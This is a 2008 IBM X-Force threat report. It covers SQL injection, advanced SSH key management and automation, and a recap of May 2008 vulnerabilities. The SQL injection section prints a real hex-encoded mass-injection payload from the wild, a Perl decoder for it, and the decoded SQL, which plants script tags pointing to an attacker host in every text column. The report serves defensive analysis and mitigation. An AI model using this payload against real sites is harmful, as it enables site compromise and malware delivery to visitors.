June 2008

IBM Internet Security Systems

X-Force Threat Insight Monthly
Table of Contents

About the Report . . . . . . . . . . . . . . . . . . . . . . . . . . . . 01

SQL Injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 02

Securing the Secure Shell –

Advanced configurations and automation . . . . . . . . . . . . . . . . 09

Prolific and impacting issues of May 2008 . . . . . . . . . . . . . . . 25

References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34
X-Force Threat Insight Monthly
Page 1

About the report

The IBM Internet Security Systems™ X-Force® Threat Insight Monthly is

designed to highlight some of the most significant threats and challenges
facing security professionals today. This report is a product of IBM Managed
Security Services and IBM Internet Security Systems (ISS) X-Force research
and development team. Each issue focuses on specific challenges and provides
a recap of the most significant recent online threats.

IBM Managed Security Services are designed to help an organization improve

its information security, by outsourcing security operations or supplementing
your existing security teams. The IBM ISS protection on-demand platform
helps deliver Managed Security Services and the expertise, knowledge and
infrastructure an organization needs to secure its information assets from
Internet attacks.

The X-Force research and development team provides the foundation for a
preemptive approach to Internet security. The X-Force research and
development team is one of the best-known commercial security research
groups in the world. This group of security experts researches and evaluates
vulnerabilities and security issues, develops assessment and countermeasure
technology for IBM ISS products, and educates the public about emerging
Internet threats.

We welcome your feedback. Questions or comments regarding the content of

this report should be addressed to [email protected].
X-Force Threat Insight Monthly
Page 2

SQL Injection

As today’s operating systems have hardened over time, attackers have turned
from attacking core operating system services to easier targets such as third
party applications, Web browsers, and Web services applications. Web
applications that are designed to interact with a database can be vulnerable to a
class of attacks known as Structured Query Language (SQL) injection.1 SQL
injection occurs when a Web application fails to properly sanitize input received
from an external source. For example, a Web form that asks for a username
normally uses the given input as part of a database query. If this Web form were
vulnerable to SQL injection, an attacker could provide valid SQL in the
username field to cause the application to generate a database query that is not
the one intended by the developer. Instead, the full range of SQL functionality
is now potentially available to the attacker resulting in possible unauthorized
database reads, writes, or even the execution of arbitrary commands on the
vulnerable system.

Many Web servers return error messages that give hints of the underlying
database schema. These error messages can help an attacker craft their SQL
injection attack by revealing table and column names. This information is used
to build an SQL statement that accomplishes the attacker’s goals. However, even
without such assistance from the Web server, techniques known as blind SQL
injection can still be used to successfully compromise the Web server. Blind
SQL injection uses statements that return “True” or “False” instead of relying
on an error message. This approach also allows for a more automated, scriptable
methodology rather than having to manually interpret a variety of error messages.
X-Force Threat Insight Monthly
Page 3

Recent attacks
It is well known that there are certain parts of the Internet that should be
avoided by users who do not want to put themselves at risk. For many years,
users were advised to visit only well-known, respectable sites and avoid
untrusted sites. The theory was that untrusted sites might attempt to download
malware via browser vulnerabilities or social engineering. Trusted sites had to
maintain their reputation in order to stay profitable and therefore could be
relied on to avoid malicious activity. However, SQL injection attacks have
recently turned that adage on its head. Even reputable sites such as government
servers in the United Kingdom2 and the United Nations3 can be unsafe when
compromised via SQL injection.

Over the last several months there have been multiple coordinated and
simultaneous mass compromises of tens of thousands of Web sites.4 These have
not been limited to just one platform or one application. Early attacks were
launched compromising Linux® Apache MySQL PHP (LAMP) systems. More
recent attacks have compromised Microsoft® Windows® IIS ASP SQL systems
and attacked phpBB installations. Some of these attacks have involved
IFRAMEs with JavaScript™ while others are outright SQL injection attacks.
Additionally, some SQL injection attacks have also been tied to the exploitation
of the Adobe® Flash® Player issue discovered by the IBM X-Force team earlier
this year.5

It is important to note that the attackers are not exploiting vulnerabilities in the
actual Web server software (IIS, Apache, etc.), so it is not enough for Web server
administrators to stay up to date on vendor patches. Attackers are analyzing Web
application packages (written in .ASP, PHP, etc.) running on the Web server in
order to find SQL injection vulnerabilities they can exploit. In some cases, once a
vulnerable Web application has been identified, attackers use search engines to
automate the process of finding target sites using the vulnerable applications.6
For each target candidate, SQL is injected into the database so that subsequent
visitors are shown custom HTML created by the attacker.
X-Force Threat Insight Monthly
Page 4

Sample payload
Here is an example of a payload used in a recent mass Web server compromise.
The payload was inserted into a parameter passed in the URL:

s=290’;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x6400650063
006C00610072006500200040006D0020007600610072006300680061007200
2800380030003000300029003B00730065007400200040006D003D00270027
003B00730065006C00650063007400200040006D003D0040006D002B002700
7500700064006100740065005B0027002B0061002E006E0061006D0065002-
B0027005D007300650074005B0027002B0062002E006E0061006D0065002-
B0027005D003D0072007400720069006D00280063006F006E0076006500
72007400280076006100720063006800610072002C0027002B0062002E0
06E0061006D0065002B002700290029002B00270027003C0073006300720069007
000740020007300720063003D00220068007400740070003A002F002F0079006-
C00310038002E006E00650074002F0030002E006A00730022003E003C002F007300
630072006900700074003E00270027003B0027002000660072006F006D00200064
0062006F002E007300790073006F0062006A006500630074007300200061002C00
640062006F002E0073007900730063006F006C0075006D006E007300200062002C
00640062006F002E00730079007300740079007000650073002000630020007700
6800650072006500200061002E00690064003D0062002E0069006400200061006E
006400200061002E00780074007900700065003D0027005500270061006E006400
200062002E00780074007900700065003D0063002E007800740079007000650020
0061006E006400200063002E006E0061006D0065003D0027007600610072006300
68006100720027003B00730065007400200040006D003D00520045005600450052
0053004500280040006D0029003B00730065007400200040006D003D0073007500
620073007400720069006E006700280040006D002C0050004100540049004E0044
00450058002800270025003B00250027002C0040006D0029002C00380030003000
300029003B00730065007400200040006D003D0052004500560045005200530045
00280040006D0029003B006500780065006300280040006D0029003B00%20AS%20
NVARCHAR(4000));EXEC(@S);--
X-Force Threat Insight Monthly
Page 5

Here is a bit of perl code that will decode the hex-encoded CAST parameter:

sub castsub {
my $cast = shift || return;
my $decoded = “CAST(“;
while ($cast =~ m#([A-F\d]{2})(0{2})?#g) {

$decoded .= pack(“C”, hex($1));

}
return $decoded;
}
while (<>) {
s#CAST\(0x([A-F\d]+)#castsub($1)#ige;
print;
}

Its output looks like:

s=290’;DECLARE @S NVARCHAR(4000);SET @S=CAST(declare @m

varchar(8000);set @m=’’;select
@m=@m+’update[‘+a.name+’]set[‘+b.name+’]=rtrim(convert(varchar,’+b.
name+’))+’’<script src=”http://[malicious_host]/0.js”></script>’’;’ from
dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and
a.xtype=’U’and b.xtype=c.xtype and c.name=’varchar’;set @
m=REVERSE(@m);set @m=substring(@m,PATINDEX(‘%;%’,@m),8000);set @
m=REVERSE(@m);exec(@m); AS NVARCHAR(4000));EXEC(@S);--
X-Force Threat Insight Monthly
Page 6

The decoded output shows Microsoft SQL Server® database software code that
searches all the tables in the database for VARCHAR (i.e., text) columns and
inserts a piece of HTML that points back to the attacker’s host. When a Web
page is constructed from the contents of the modified table and served to a
visitor, the visitor unwittingly downloads arbitrary content from the attacker.

In the recent mass Web server attacks, the content served by the injected HTML
consists of browser exploits designed to compromise the visitor’s computer and
install a Trojan that can be remotely controlled by the attacker. The visitor’s
system then becomes yet another node in the attacker’s botnet and can be used
to send spam, search for more sites vulnerable to SQL injection, etc. At least one
set of attackers has used this mechanism to gather passwords for a massively
multiplayer online role-playing game (MMORPG) named World of Warcraft™7.
The attackers then compromise the World of Warcraft accounts in order to
launder assets from the game into real world currency8. These SQL injection
attacks have been extremely effective.
X-Force Threat Insight Monthly
Page 7

Mitigation
Unfortunately, attackers have many available options for remaining
undetected. There are multiple ways of disguising and obfuscating their attack
to prevent discovery. In order to prevent SQL injection, Web applications must
be scanned or audited for places where unfiltered user input is allowed through
to the database. This includes Web forms, URL parameters, and cookie values.
Where possible, use parameterized SQL statements so that the underlying
database driver can escape the harmful characters. Also, monitor Web logs for
intrusion attempts such as hex-encoded strings or SQL keywords such as
DECLARE, CAST, CONVERT, UNION, INSERT or UPDATE.

If you suspect you have been a victim of the recent SQL injection attacks, you
can automate the database cleanup. A template for a Microsoft SQL Server site
might look something like this9:

DECLARE @BAD VARCHAR(200)

SET @BAD = ‘<script src=http://[malicious_url]></script>’ -- DONT GO

HERE OR CLICK THIS LINK

DECLARE @T varchar(255),@C varchar(255)

DECLARE Table_Cursor CURSOR FOR select a.name,b.name
from sysobjects a,syscolumns b
where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or
b.xtype=231 or b.xtype=167)

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(‘update [‘+@T+’]
set [‘+@C+’]= REPLACE(‘+@C+’,’’’ + @BAD + ‘’’, ‘’’’)’
FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor
DEALLOCATE Table_Cursor
X-Force Threat Insight Monthly
Page 8

In addition to Web application auditing, administrators should review their

remote access policies and verify that reusable passwords are prohibited in
favor of strong authentication mechanisms such as SSH “authorized_keys.”
Remote access to administrative accounts should be disabled entirely with the
possible exception of tightly controlled applications and keys. To minimize the
risk of becoming infected when visiting compromised sites, client systems must
ensure that they have applied the latest security patches for browsers and plug-
ins (Flash, Realplayer™, etc.). Additionally, “ghost” accounts (expired accounts
or accounts where individual owners are no longer present), should be removed.

The IBM ISS signature “SQL_Injection” heuristically detects SQL injection.

Some Web applications are coded to use SQL injection in database transactions.
Before enabling blocking for this attack, please see KBA 4748 for tuning
suggestions10. Additionally, the IBM ISS signatures “HTML_VML_Heap_
Overflow” and “Upx_Packed_Executable” may trigger when clients browse
infected Web servers.

Public defacement, confidential data leakage, and database server compromise

can result from these attacks. Complete compromise of vulnerable client
systems is also possible. It is imperative that organizations treat SQL injection
vulnerabilities as a serious threat and address them accordingly.
X-Force Threat Insight Monthly
Page 9

Securing the Secure Shell –

Advanced configurations and automation
Part three of a three-part series on Securing the Secure Shell, SSH.

Introduction
Part 1 of Securing the Secure Shell focused on the history of the Secure Shell
(SSH), the problems with ongoing compromise of SSH servers through
compromised credentials, and the problems rife with the use of reusable
passwords for access to SSH services. Part 1 also introduced the use of SSH
authentication keys and the elimination of reusable passwords on public facing
servers. However, SSH authentication keys alone are not a panacea for securing
SSH, and authentication keys have their own set of problems that must be
recognized and addressed. Part 2 of this series examined securing and managing
SSH authentication keys through ssh-agent and other mechanisms. Part 3
expands on the authentication mechanisms and examines how to address complex
configurations between remote systems, provide authenticated superuser access
and apply these techniques to automated applications and processes.

The problem set (part 3)

SSH authentication keys are a convenient way of hardening access to SSH
services, especially on remote servers that are accessible to the greater Internet.
A key agent makes these keys even more convenient for multiple connections
while keeping the private keying material secure. While this addresses first
order connections from a secure client to a remote server, this still leaves a
number of common administrative tasks unaddressed.

Administrators frequently require access to the superuser account on remote

machines to perform a multitude of administrative tasks. While there are
established means for providing that access, they currently require passwords,
either a shared superuser password or the user’s password, in order to grant
access. Elimination of reusable passwords in conjunction with SSH has been
the overriding goal of this series.
X-Force Threat Insight Monthly
Page 10

Often, remote server to server access is needed. This may be for backup
purposes, for performing a hotsync between redundant servers, or for migrating
virtual machines from one physical host machine to another host. These kinds
of access may require large bulk transfers of data. Manipulating small files on
multiple remote servers from a single secure vantage may be practical but
performing large bulk transfers, such as backups, is not. This type of transfer
doubles the amount of net traffic and sends it through longer connections with
smaller bandwidth pipes through security perimeters on its way to and from the
client. This can clog remote connections and degrade network service. Some
server to server tasks can be performed using unprivileged accounts while
other complex tasks require direct root-to-root and server-to-server activity.

Additionally, many administrative tasks, such as backups, need to be

automated. This has often been done with private keying material present on
one or more servers, often with no password. These are the sorts of security
holes that result in a rapidly spreading compromise between systems when only
one system is initially compromised.
X-Force Threat Insight Monthly
Page 11

SSH agent forwarding

SSH agent forwarding provides a powerful tool to forward authentication for
second order, third order, and higher connections from remote systems back
through multiple hops to the secure client where the SSH agent is operating.

Forwarding can be designated on a connection by connection basis from the

client and extended out through a variable number of hops before being
discontinued. The controlling agent is also not required to be directly on the
client workstation but may be one or more hops away from the client on an
intermediary server and may be controlling a subset of connections.

3rd ORDER SSH

2nd ORDER 2nd ORDER AGENT 4th ORDER SSH

REMOTE SERVER REMOTE SERVER REMOTE SERVER REMOTE SERVER REMOTE SERVER

1st ORDER
2nd ORDER SSH
1st ORDER AGENT
SSH- 2nd ORDER SSH
1st ORDER SSH- 1st ORDER AGENT
AGENT AGENT

CLIENT SYSTEM AGENT SERVER

(Little Black Box)

1st ORDER SSH

ORDERS OF CONNECTIONS HIGHER ORDER CONNECTIONS WITH

CLIENT SYSTEM INTERMEDIARY KEY SERVER
X-Force Threat Insight Monthly
Page 12

Problems with SSH forwarding

There is some risk with blindly forwarding all SSH authentication requests. An
attacker on a compromised system could take advantage of ssh-agent-
forwarding to attack other systems. All that the attacker needs is read/write
access to an active authentication forwarding socket, which, on UNIX® systems,
is usually in the form of a named pipe. The attacker would have to have already
compromised the user’s account or the root account on the system, in order to
do this. Consequently, compromise of the authentication forwarding is probably
the least of the user’s problems. An attacker with that level of authority can do
far more damage and accomplish much more in the way of planting Trojans or
otherwise compromising and gaining access to the user’s account.

To manage forwarded key authentications, the ssh-agent on UNIX supports

several control mechanisms. The agent itself can be “locked” with a simple
password when the user does not wish to allow any agent authentication. The
password must then be reentered to unlock it. Unauthorized authentication
requests can then be easily blocked and detected. Because the locking
mechanism is part of the authentication protocol, the agent could be locked
remotely through a forwarding connection. In theory, an attacker could attempt
this with an unwitting user, but this activity would be an obvious giveaway that
something was amiss.

Individual keys may also be added to the agent on UNIX with a “confirm”
option. When flagged as confirm, a pop-up window will appear any time the
key is used for authentication. This does not require a password, but merely an
“ok” or “cancel” to allow or deny the authentication attempt. The pop-up is
managed by a handler which can be specified to the ssh-agent at the time it is
started. Using this mechanism, a script may be specified to manage the key
confirmation in complex configurations or for automation.
X-Force Threat Insight Monthly
Page 13

SSH agent locking and confirmation work differently with Windows clients than
with UNIX clients. On UNIX, one agent can serve any number of clients and is
server agnostic with regards to the keys it serves. Windows clients generally have
built in agents that are aware of the servers to which they are connected and can
specify which keys are available to which servers over forwarded authentication
connections. This can create problems where multiple keys are required for higher
order connections to other servers. To get around these limitations, Windows
clients may have to work through intermediary systems in a layered approach with
SSH agents providing the necessary depth of keys for complex configurations.

Overall, the risks from ssh-agent-forwarding are minimal and it provides a

powerful mechanism to keep sensitive keying material safe, even across
multiple connections. What little risk remains is manageable.

Superuser access
Superuser or root access is often a thorny administrative problem. On one hand,
multiple people may need limited or unlimited access to the root account. On
the other hand, this access needs to be protected and audited. It is a very
common practice to forbid unlimited remote root access and to force users
requiring superuser privileges to authenticate as themselves and then elevate
their privileges to that of root. This task generally requires a reusable password
of one form or another and the practice of employing reusable passwords should
be avoided when possible.

Granting access to the superuser account always entails some risk and can be
difficult to log and audit, owing to the power of the superuser to alter the logs. Even
without SSH involved, it is generally advisable to provide for an autonomous logging
server to which all security events are logged. Access to the logging server is then
forbidden to accounts with access to the servers that are being serviced by it. In this
way, even if a superuser account on a server is compromised, the logs leading up
to the compromise are available for audit and cannot be tampered with. This can be
accomplished with even a very lightweight “little black box” at each remote site.
X-Force Threat Insight Monthly
Page 14

One older, common utility for granting root access is the “su” (also referred to
as “Super User,” “Step Up” or “Switch User”). This command requires the user
to authenticate as the target user (it can switch to users other than root as well).
Anyone using this command to become root must, therefore, know the root
password. This could result in significant consequences for an organization.
Reusable passwords are bad enough. Shared reusable passwords are on an
entirely different – and worse – level. Use of the “su” command should also be
avoided whenever and wherever possible.

A superior command for providing superuser access is the “sudo” command (or
“super” on some flavors of UNIX). This command allows an unprivileged user
to run a command or a shell as root. Which account or group is allowed to run
what commands is controlled by a central configuration file “sudoers.” To use
sudo, an authorized user must authenticate with his or her own password. Sudo
remembers which users have authenticated and does not require reentering the
password for every command. While sudo provides all the functionality of su
along with much finer grained access control, sudo still requires the use of a
reusable password, or no password at all for members of special groups such as
“wheel” if so configured. This is much better than “su” but the goal is to
eliminate the vulnerabilities that are inherent in the use of reusable passwords.

Another option is to use SSH to the root account on the local host. This has
several differences from su or sudo with some advantages and some
disadvantages.

• Advantage: Access to the root account can be locked down and restricted to localhost
only using options in the root authorized_keys file.
• Advantage: It can be as fine grained and versatile as sudo.
• Disadvantage: It takes more effort to set up and configure for complex combinations
of commands.
• Disadvantage: Unlike sudo, it does not preserve the current working environment,
such as current working directory.
• Like su, it acts as a new login as the root user. This could be either an advantage or a
disadvantage depending on the application.
• Auditing of superuser activity must take into account the SSH connections and the user
of origin. This is neither an advantage nor a disadvantage but an operational note.
X-Force Threat Insight Monthly
Page 15

Combined with ssh-agent-forwarding, access to the superuser account is only

available when an appropriate session is connected from a client bearing the
private keying material and forwarding authentication. Unlike either su or
sudo, no reusable passwords are required and no access to the superuser
account is possible outside of when a legitimate account is connected.

SSH AUTHENTICATE ROOT ACCESS

SSH- 2nd ORDER

AGENT ROOT

CLIENT SYSTEM REMOTE SERVER

1st ORDER
USER

Server to server access

Server to server communications and data transfer is another area of concern.
Often this involves large scale bulk transfers of backups, images, or hot standby
data that would otherwise clog the more limited communications channels
going into and out of a secure control point. It makes little sense to transfer
gigabytes of data from a server into a secure system and then back out to
another system sitting right next to the source server. Some of this data may be
no more than back and forth data between two non-privileged users on those
boxes. In some rare cases, some of this traffic may require direct root to root
data transfers to deal with privileges and permissions. To facilitate server to
server communications, a common practice has been to maintain private
keying material on one server or the other to authorize connections. This
requires strong passphrases on the keying material lest it expose both servers
should one or the other server be compromised. Because of this cross-
vulnerability, maintaining private keying material in this manner is a
suboptimal and risky method.
X-Force Threat Insight Monthly
Page 16

In the less complicated case of server to server communications with non-

privileged accounts, server to server communications can be simply handled
through ssh-agent forwarding. The private keying material remains behind
secure security perimeters and authentication for second order or higher
connections between servers is simply forwarded back to the agent. With this
method, no private keying material is present on the external servers and no
access between servers is possible when the appropriate client is not connected
in a session.

The case where server to server communications is required with root to root
access is far more complex. With superuser access on either system, there is risk
to the system outside of the domain of the maintenance tasks at hand. This is an
asymmetrical risk. If the client system can only read from the server system,
then it is incapable of modifying the server system and risk is limited to
inadvertent information disclosure. If the client system can write to the server
system the risk is manifestly greater due to the ability to modify configurations
on the target server.

SSH provides for “forced commands” as an option in the authorized keys file.
When a key is specified with a forced command, only that command executes
for that key. That command may, in turn, execute the requesting command, or
it may deny access entirely. An example of this is the rrsync script (Restricted
RSYNC) available in the rsync package. When using the rrsync forced
command, only rsync is authorized and directories can be specified as read only
or with read/write subdirectories. With this, the command is limited and the
data flow is limited, preventing even rsync from overwriting the control files
which limit its behavior. For a backup process, this could be used to either limit
a backup client to receiving data (pull mode) or to limit a backup client to
writing data only to a designated backup area (push mode). More complex
scenarios are possible using a variety of openly available shell scripts for this
forced command.
X-Force Threat Insight Monthly
Page 17

The restrictions imposed by SSH forced commands are contained in the

authorized_keys file which is normally a file users can write to. Commands
permitted to a user should not include the ability to overwrite the configuration
files that impose these restrictions. In situations where this is an issue, the file
may need to be relocated to a non standard location or otherwise secured from
unauthorized alteration and managed from a secure management site.

Filtering the SSH service

Because outside access to the SSH service in general is desirable for non-
privileged accounts, it becomes difficult to filter access for the root account. As
mentioned earlier, an option available for the authorized keys file is to specify
from where the key is valid. Keys provided for data transfer between two
systems can be restricted to just those two systems, in addition to restricting
what commands they can execute. Commands granting general superuser
privileges can be restricted to only commands coming from the local system,
forcing a legitimate login with legitimate SSH authentication as a prerequisite
for access to the root account.

The exception to this may be in the case of using Internet Protocol Version 6
(IPv6) for remote access. With IPv6, it is possible to block all non-local Internet
Protocol Version 4 (IPv4) access while allowing traffic between servers to take
place over IPv6. While this is possible in a pure IPv4 environment, it requires
complex filtering and firewall rules and is much more difficult to implement.
X-Force Threat Insight Monthly
Page 18

Automation
Many management tasks in the UNIX world are automated and that presents a
vexing problem with SSH. Reusable passwords are bad. Reusable passwords in
scripts and automation are worse and even passwords on private keying
material are useless when the password must be buried in a script. The problem
is compounded when the keying material and the scripts are present on a
remote system to access other remote systems. When there is no interactive
input from a user, there must either be no password or the password must be
available to the automation process, and thus available to an attacker. For this
reason, the private keying material and the automation process must be secured
by other means.

One option to securing automated processes and keying material is to employ a

Little Black Box; or LBB for short. The LBB is secured through multiple means.
Filtering and access controls limit who can access the system and it should be
maintained in the most secure areas of the local net. It is of limited
functionality and low profile, offering no services other than the limited
connections for authorized user access.
X-Force Threat Insight Monthly
Page 19

The LBB shown here is an inexpensive fanless box with an internal hard drive
that only draws five watts of power. Even with only 256MB of RAM, it is more
than capable of orchestrating management jobs on a multitude of remote
systems. It has two Ethernet ports, and a serial port for communications. The
two USB ports can support multiple memory devices, smart cards, and a
console. In the foreground is an 8GB USB memory stick (red) and a USB
cryptographic smart card (blue).

An automated process running on the LBB can, at run time, set up appropriate
authentication agents and load them with the necessary keys. It can then
connect to the remote systems using an unprivileged account to kick off the
jobs that would have previously been started by “cron” on those remote systems.
It may connect up to root on the local host, authenticated through the agent
forwarding as described in a previous section, and subsequently initiate server
to server tasks such as backups as restricted by various filtering limitations and
forced commands on the destination server.
X-Force Threat Insight Monthly
Page 20

Automated processes can be hardened even further through the use of key
confirmation by script on the LBB. Each step of an orchestrated process can be
assigned a different key. As each key is used, it is confirmed by the process
running on the LBB. Each key is used in sequence and not used out of sequence
or twice in a row. If an attacker were to attempt to misuse a key through a
forwarded authentication, this would be immediately detected as an out of
sequence access. When the process is not running, access is not possible
because the keys are unavailable. When the process is running, the keys are
available but their sequence is controlled and abuse is detectable.

The technique for orchestrated, sequential, processes can be taken one step
further with the implementation of a “finite state machine” as the confirmation
agent. Using multiple keys, the confirmation agent can regulate the start and
finish of operations and transition through complex operations while adding,
deleting, and enabling keys dynamically.

SERVER TO SERVER OPERATION

ROOT ROOT
ROOT
REMOTE SERVER REMOTE SERVER

USER USER

SSH-
AGENT
AUTOMATION AUTOMATION SYSLOG SERVER
SERVER CONTROL SYSTEM (Little Black Box)
(Little Black Box)

FINITE STATE
MACHINE

Using this technique, all automated processes and associated private keying
material can be migrated back into the security of the LBB and removed from
all remote systems. Embedded passwords and exposed keys on remote systems
are thereby eliminated while retaining the automation functionality.
X-Force Threat Insight Monthly
Page 21

A real world worst case example

Even with all of this, there are tasks and applications, due to complexity or poor
design, that are extremely difficult to isolate using these techniques. One real
world example of a worst case scenario is from the OpenVZ project, vzmigrate.

OpenVZ is a Linux based virtualization system of the containers approach,

similar to Solaris Zones or BSD Jails. It provides low overhead operating system
virtualization for virtual systems that can run on a common kernel. The
vzmigrate application provides the ability to dynamically migrate live virtual
systems between host systems.

The vzmigrate application works by progressively synchronizing the data of the

running virtual machine from the host it is running on to the host it is being
migrated to. When the data are sufficiently synchronized, vzmigrate suspends
the virtual machine in place, synchronizes the remaining data and machine
state, revives the suspended machine on the new host system, and then cleans
up the old data and any remnants. The virtual machine is moved from one host
system to another with very little production down time.

In order to perform this task, vzmigrate requires root access on both servers in
order to access all the files and to set up access, ownership, and permissions on
the destination system. It also must have the ability to write to the destination
system in several areas and must be able to remove old data no longer in use. It
operates where the virtual system is initially running and moves data and
system state information to the destination. This all adds up to a worst case
scenario. The application writes massive amounts of data to several locations on
a remote system and requires remote execution of several commands, including
rsync, vzctl, and rm, amongst others.

While this may be manageable using forced commands on the destination, it is

complex at best and difficult to generalize without creating security holes.
X-Force Threat Insight Monthly
Page 22

An LBB may be used for another approach. This time, an interactive user
connects to the LBB using an unprivileged account and runs a vzmigrate
wrapper on that system. The vzmigrate wrapper sets up its own SSH
authentication agent and loads appropriate keys. It can then connect to the first
hosting server using an unprivileged user account and connect through
localhost up to root. From there, it runs the vzmigrate command to the second
remote server, the destination for the virtual server. All authentication is
managed as in the automation case described previously. In this case, the
operation is initiated by an administrator, rather than a cron job.

VZMIGRATE OPERATION

ROOT ROOT
ROOT
REMOTE SERVER REMOTE SERVER

VZUSER VZUSER

SSH-
AGENT VZUSER
AUTOMATION
SERVER VZMIGRATE SYSLOG SERVER
WRAPPER (Little Black Box)
(Little Black Box)
USER
USER
SSH VZMIGRATE
IMPLEMENTATION

CLIENT SYSTEM

Any time root access is granted to multiple remote systems to perform complex
tasks, it causes a sensitive situation. In this case, three systems are actually
involved; the two host systems and the guest system being moved. The two host
systems merely have root access granted. From the standpoint of the guest
system, however, action is taking place outside of its nominal scope. This “deus
ex machina” can still have serious impact on the virtual system without
appearing inside the system or its processes. To the guest system, this is beyond
root access, it is the equivalent of remote physical access. By using an LBB in
this layered approach, the highly sensitive keys which are employed in this case
can be isolated from the requesting user as well as the remote systems.
X-Force Threat Insight Monthly
Page 23

SSH key authentication vs. single sign-on

Using authentication keys as described here is significantly different than
“single sign-on” although it appears similar to the end user. In this case, a user
signs on to a specific secure location and can then manage everything without
entering additional passwords and without exposing external systems to the
risks of reusable passwords. Unlike general purpose single sign-on, a user
cannot sign on anywhere and go anywhere; they can only sign on at a limited
number of sign-on locations and only from there be granted additional access.

At the end of the day

The importance of administrative access is to be able to deal with events that
have been unanticipated. Someone has to have the authority to make
connections and perform operations that were not anticipated. This often
involves setting up automated or managed tasks for delegation to others or for
dealing with emergency situations. For these ultimate problems, there needs to
be a final set of keys. The objective of everything else is to minimize the
demand for these “omega” keys and the objective of the use of an omega key is
to minimize its subsequent use. These keys should be subject to the utmost
security and stored on smartcards or in secured locations where they can be
tracked and inventoried. These are also the keys with the power to create new
keys at the highest level.

Recommendations
• Secure all private keying material in secure locations.
• Allow SSH agent forwarding with appropriate confirmations.
• Use a Little Black Box (LBB) for specialized tasks.
• Secure logging server
• Automation control server
• Layered key storage
• Agent proxy for complex keying arrangements
• Central management of ssh configuration files such as authorized_keys files
• Limit unconstrained root access to a limited number of “omega keys”.
X-Force Threat Insight Monthly
Page 24

Conclusion
This series started by pointing out the flaws inherent in reusable passwords and
how that represents the single largest vulnerability in SSH. During the course
of these articles, increasingly complex scenarios were presented where reusable
passwords have been eliminated and replaced with cryptographically strong
SSH authentication. These keys are then secured and managed in a way to
prevent their abuse and still allow for complex operations and automation. It is
possible to eliminate reusable passwords in SSH and secure the keys. By doing
so, organizations help secure the secure shell from the pervasive attacks on the
outside networks. At the same time, SSH use is simplified and overall security is
made more transparent and robust.
X-Force Threat Insight Monthly
Page 25

Prolific and impacting issues of May 2008

Significant disclosures
In May, the X-Force team analysts researched and assessed 530 security related
threats. A significant percentage of the vulnerabilities featured within the
X-Force team database became the focal point of malicious code writers whose
productions include malware and targeted exploits.

Total Vulnerabilities in May 2008: 530

Critical High Medium Low

Vulnerability Vulnerability Vulnerability Vulnerability
1 94 350 85
X-Force Threat Insight Monthly
Page 26

The chart below categorizes the vulnerabilities researched by X-Force team

analysts, according to what they believe would be the greatest categories of
security consequence that could result from exploitation of the vulnerability.
The categories are: Bypass Security, Data Manipulation, Denial of Service, File
Manipulation, Gain Access, Gain Privileges and Obtain Information. *

48%

0.4%
2%
6%
3% 26%
7%
8%
* Represent unique
vulnerability count.

Bypass Security – 7%
An attacker can bypass security restrictions such as a firewall or proxy, an IDS system
or a virus scanner.
Data Manipulation – 26%
An attacker is able to manipulate data stored or used by the host associated with the
service or application.
Denial of Service – 8%
An attacker can crash or hang a service or system, or take down a network.
File Manipulation – 0.4%
An attacker can create, delete, read, modify or overwrite files.
Gain Access – 48%
An attacker can obtain local and remote access. This also includes vulnerabilities in
which an attacker can execute code or execute commands, because this usually allows
the attacker to gain access to the system.
Gain Privilege – 3%
An attacker can gain privileges on the local system only.
Obtain Information – 6%
An attacker can obtain information such as file and path names, source code,
passwords or server configuration details.
Other – 2%
An attacker can perform other, less common attacks, such as price changing. Used when
the other consequences do not apply.
X-Force Threat Insight Monthly
Page 27

On May 13, 2008, the X-Force team published a protection alert to address a
serious vulnerability disclosed in the Microsoft Security Bulletin Summary for
May 2008. The Microsoft Jet Database Engine (msjet40.dll) is vulnerable to a
stack-based buffer overflow that could allow remote code execution. An
attacker could exploit this vulnerability by sending a malicious file as an e-mail
attachment or by hosting it on a Web site and persuading the victim to click a
link. This issue was publicly disclosed in late March with reports of targeted
attacks using this vulnerability.11

While .mdb is on the Microsoft default unsafe file type list, a Jet database file
can be opened from a Microsoft Word document. Although no public proof of
concept code has been published, X-Force analysts consider this to be the most
severe vulnerability in the May Microsoft patch release due to the active
exploitation that has been seen in the wild.

• A protection alert provided by IBM ISS: Microsoft Jet Database Engine

(msjet40.dll) Remote Code Execution12
• IBM ISS Protection Signature:
– MDB_Jet_Engine_Stack_Overflow
• Microsoft Security Bulletin MS08-028: Vulnerability in Microsoft Jet Database
Engine Could Allow Remote Code Execution (950749)13
• CVE-2007-602614

Additional May highlights

This section of the report briefly covers some of the additional threats facing
security professionals during the month of May.

Elevation of Threat Level – SQL injection attacks

Last month, the threat level was elevated to AlertCon 2 and the X-Force team
produced a protection alert15 as a result of a significant increase in the volume
of targeted SQL injection attacks observed by our analysts. This report, as well
as the past couple of reports, has highlighted the mass compromise of a large
number of Web sites occurring over the past several months. However, in May,
these attacks escalated and culminated into automated SQL injection attacks
that, in some cases, have systematically defaced Web sites.
X-Force Threat Insight Monthly
Page 28

Some reports that surfaced earlier in May speculated that the attacks are being
carried out via a worm. However, our analysts have not confirmed that there is a
self-propagation vector. It appears, at this time, to be more along the lines of
botnet related mass defacements. Indications are that certain Trojans and
botnets associated with these attacks are conducting search engine queries for
ASP / .net pages with certain characteristics and then attacking them en masse.

One such botnet, called the Asprox botnet, is spreading SQL injection tools
disguised as an executable file called msscntr32.exe. The tool searches
Google™ for vulnerabilities in Web pages and then injects an IFrame into the
pages redirecting victims to malicious servers. The X-Force team regularly
identifies 20 to 30 new malware-hosting sites linked to the legitimate URLs
hacked by SQL-infection attacks each day.

Multiple products that use data in SQL queries are vulnerable to SQL injection.
Attackers can use SQL injection techniques to exploit Web sites and
applications that implement SQL queries without first removing potentially
harmful characters. In many cases, all it takes is a single improper line of code
in a Web page to open it up to a SQL injection attack that results in a
compromise of the entire database, thus compromising an entire site. Many
modern Web sites have the database at the core, so this is a pervasive problem.

We encourage readers to review the “SQL Injection” article in the beginning of

this report. It provides additional information regarding this threat and
provides guidance in ways to help mitigate the risk of SQL injection attacks.

Active Exploitation – Adobe Flash Player

